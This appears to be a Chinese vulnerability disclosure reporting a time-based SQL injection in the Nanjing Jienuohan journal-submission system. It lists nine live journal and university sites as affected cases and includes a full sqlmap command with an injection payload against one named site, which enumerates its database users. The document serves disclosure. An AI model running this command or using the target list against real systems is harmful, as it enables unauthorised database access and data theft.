VULHUB ™

### 简要描述： RT ### 详细说明： 南京杰诺瀚期刊投稿系统存在SQL延迟注入漏洞，可获取数据库任意数据... 官网：http://www.025journal.com/ [<img src="https://images.seebug.org/upload/201411/19103213fee7c9b2acc1c9232ba1bce0beb95726.jpg" alt="QQ图片20141119101310.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19103213fee7c9b2acc1c9232ba1bce0beb95726.jpg) 案例： http://www.cjge-manuscriptcentral.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.lcmzxzz.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://j.chinatransducers.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://gaojian.xhnj.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://xb.cuit.edu.cn/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.jsnyxb.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.lcsjwk.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.linpi.net/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.mfskin.net/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 由于是延时注入 ### 漏洞证明：...

### 简要描述： RT ### 详细说明： 南京杰诺瀚期刊投稿系统存在SQL延迟注入漏洞，可获取数据库任意数据... 官网：http://www.025journal.com/ [<img src="https://images.seebug.org/upload/201411/19103213fee7c9b2acc1c9232ba1bce0beb95726.jpg" alt="QQ图片20141119101310.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19103213fee7c9b2acc1c9232ba1bce0beb95726.jpg) 案例： http://www.cjge-manuscriptcentral.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.lcmzxzz.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://j.chinatransducers.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://gaojian.xhnj.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://xb.cuit.edu.cn/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.jsnyxb.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.lcsjwk.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.linpi.net/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 http://www.mfskin.net/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 由于是延时注入 ### 漏洞证明： 只演示1个站了 http://www.cjge-manuscriptcentral.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1 sqlmap.py -u "http://www.cjge-manuscriptcentral.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch [<img src="https://images.seebug.org/upload/201411/19104553d13158e2d5a000dd3ba1aba0791c6a03.png" alt="QQ图片20141119104531.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19104553d13158e2d5a000dd3ba1aba0791c6a03.png) [<img src="https://images.seebug.org/upload/201411/191046001d7f178dd2c63d2f0926af1d72e16f60.jpg" alt="QQ图片20141119104545.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/191046001d7f178dd2c63d2f0926af1d72e16f60.jpg)